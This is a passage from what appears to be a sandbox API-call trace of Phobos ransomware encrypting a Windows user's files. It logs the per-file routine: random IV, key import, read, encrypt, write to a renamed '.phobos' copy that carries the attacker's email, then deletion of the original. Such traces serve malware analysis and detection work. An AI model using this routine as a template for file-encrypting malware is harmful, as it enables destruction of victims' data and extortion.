phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0190.499] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.499] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0190.499] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.499] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0190.499] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.499] CloseHandle (hObject=0x12c) returned 1 [0190.499] CloseHandle (hObject=0x134) returned 1 [0190.499] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm")) returned 1 [0190.500] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.501] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=230) returned 1 [0190.501] CloseHandle (hObject=0x134) returned 1 [0190.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm")) returned 0x2020 [0190.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.502] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0190.502] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.502] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe6, lpOverlapped=0x0) returned 1 [0190.503] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0190.503] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0190.504] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0190.504] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.504] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0190.504] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.504] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0190.504] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.504] CloseHandle (hObject=0x134) returned 1 [0190.504] CloseHandle (hObject=0x12c) returned 1 [0190.504] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm")) returned 1 [0190.505] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.506] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7505) returned 1 [0190.506] CloseHandle (hObject=0x12c) returned 1 [0190.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg")) returned 0x2020 [0190.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.506] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.506] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.507] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0190.507] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.507] ReadFile (in: hFile=0x12c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1d51, lpOverlapped=0x0) returned 1 [0190.633] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d60, dwBufLen=0x1d60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d60) returned 1 [0190.633] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1d60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1d60, lpOverlapped=0x0) returned 1 [0190.634] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0190.634] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.634] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0190.634] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.634] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0190.634] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.634] CloseHandle (hObject=0x12c) returned 1 [0190.634] CloseHandle (hObject=0x134) returned 1 [0190.634] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg")) returned 1 [0190.635] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.636] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16560) returned 1 [0190.636] CloseHandle (hObject=0x134) returned 1 [0190.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png")) returned 0x2020 [0190.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.636] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.636] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.646] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0190.646] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.646] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x40b0, lpOverlapped=0x0) returned 1 [0190.753] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40c0, dwBufLen=0x40c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40c0) returned 1 [0190.754] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x40c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x40c0, lpOverlapped=0x0) returned 1 [0190.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0190.755] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.755] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0190.755] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.755] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0190.755] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.755] CloseHandle (hObject=0x134) returned 1 [0190.755] CloseHandle (hObject=0x12c) returned 1 [0190.755] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png")) returned 1 [0190.757] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.776] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=115554) returned 1 [0190.776] CloseHandle (hObject=0x12c) returned 1 [0190.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png")) returned 0x2020 [0190.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.777] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.777] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.778] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0190.778] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.778] ReadFile (in: hFile=0x12c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c362, lpOverlapped=0x0) returned 1 [0190.877] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c370, dwBufLen=0x1c370 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c370) returned 1 [0190.878] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1c370, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1c370, lpOverlapped=0x0) returned 1 [0190.880] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0190.880] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.880] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0190.880] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.880] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0190.880] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.880] CloseHandle (hObject=0x12c) returned 1 [0190.880] CloseHandle (hObject=0x134) returned 1 [0190.880] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png")) returned 1 [0190.881] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0U1GwY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0u1gwy.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.927] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=57464) returned 1 [0190.927] CloseHandle (hObject=0x194) returned 1 [0190.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0U1GwY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0u1gwy.jpg")) returned 0x2020 [0190.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0U1GwY.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0u1gwy.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0U1GwY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0u1gwy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.928] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.928] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0U1GwY.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0u1gwy.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.012] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.012] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, 